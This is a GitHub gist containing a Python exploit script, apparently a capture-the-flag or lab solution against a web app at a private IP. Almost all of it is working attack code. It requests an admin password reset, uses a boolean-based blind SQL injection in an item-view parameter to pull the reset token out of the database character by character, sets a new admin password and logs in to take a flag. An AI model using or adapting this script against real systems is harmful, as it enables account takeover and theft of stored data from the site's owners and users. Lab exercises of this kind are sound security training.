Created
March 24, 2023 12:46
-
-
Save thesp0nge/e5b0b01c19efecbc890d50c225810a88 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import requests | |
| import random | |
| import string | |
| import re | |
| def viewItem(s, target, query): | |
| url = "http://%s/item/viewItem.php?id=5+or+%s" % (target, query) | |
| proxies = { "http" : "http://localhost:8080" } | |
| r = s.get(url, proxies=proxies) | |
| if int(r.status_code) == 404: | |
| return True | |
| return False | |
| # Returns True if the password reset request is successful, False otherwise. | |
| def ask_reset_password(s, target, username): | |
| url = "http://" + target + "/login/resetPassword.php" | |
| data = { "username" : username } | |
| proxies = { "http" : "http://localhost:8080" } | |
| response = s.post(url, data=data, proxies=proxies) | |
| ok_message = "Password Reset Link has been sent to you via Email, please check it out." | |
| if (ok_message in response.text): | |
| return True | |
| return False | |
| def change_admin_password(s, target, token, new_password): | |
| url = "http://%s/login/doChangePassword.php" % (target) | |
| data= {"token":token,"password":new_password} | |
| proxies = { "http" : "http://localhost:8080" } | |
| response = s.post(url, data=data, proxies=proxies) | |
| if "Success!" in response.text: | |
| return True | |
| return False | |
| def get_first_flag(s, target, new_password): | |
| url = "http://%s/login/checkLogin.php" % (target) | |
| data = {"username":"admin","password":new_password} | |
| proxies = { "http" : "http://localhost:8080" } | |
| response = s.post(url, data=data, proxies=proxies) | |
| if "Success!" in response.text: | |
| flag_regex = re.compile("FLAG1: [\da-f]*") | |
| flag = flag_regex.findall(response.text)[0][7:] | |
| return flag | |
| else: | |
| return "" | |
| s = requests.session() | |
| # STEP 1. RICHIEDERE IL RESET PASSWORD PER ADMIN | |
| print("[*] Sending password reset request... ", end='') | |
| status = ask_reset_password(s, "192.168.122.219", "admin") | |
| if (status == True): | |
| print(" success!") | |
| else: | |
| print(" failure!") | |
| sys.exit(-1) | |
| print("[*] check if the target is exploitable... ", end='') | |
| status = viewItem(s, "192.168.122.219", "1=1") | |
| if (status == True): | |
| print(" success!") | |
| else: | |
| print(" failure!") | |
| sys.exit(-1) | |
| print("[*] exfiltrating token.... ", end='') | |
| sys.stdout.flush() | |
| token_query = "(select+ascii(substr((select+token+from+user+where+id=1),%d,1)))%s%d" | |
| token_found = "" | |
| for i in range(1,50): | |
| low = 32 | |
| high = 126 | |
| middle = 0 | |
| found = False | |
| while low <= high and not found: | |
| middle = (high + low) // 2 | |
| if viewItem(s,"192.168.122.219", token_query % (i,">",middle)): | |
| low = middle + 1 | |
| elif viewItem(s, "192.168.122.219", token_query % (i,"<",middle)): | |
| high = middle - 1 | |
| else: | |
| token_found += chr(middle) | |
| found = True | |
| if not found: | |
| break | |
| print(token_found) | |
| new_password = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) | |
| print("[*] changing admin password with '%s'" % new_password, end= '') | |
| if change_admin_password(s, "192.168.122.219", token_found, new_password): | |
| print(" success!") | |
| else: | |
| print(" failure!") | |
| sys.exit(-2) | |
| print("[*] login and get first flag...", end='') | |
| flag=get_first_flag(s, "192.168.122.219", new_password) | |
| if flag: | |
| print(flag) | |
| else: | |
| print(" failure!") | |
| sys.exit(-3) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment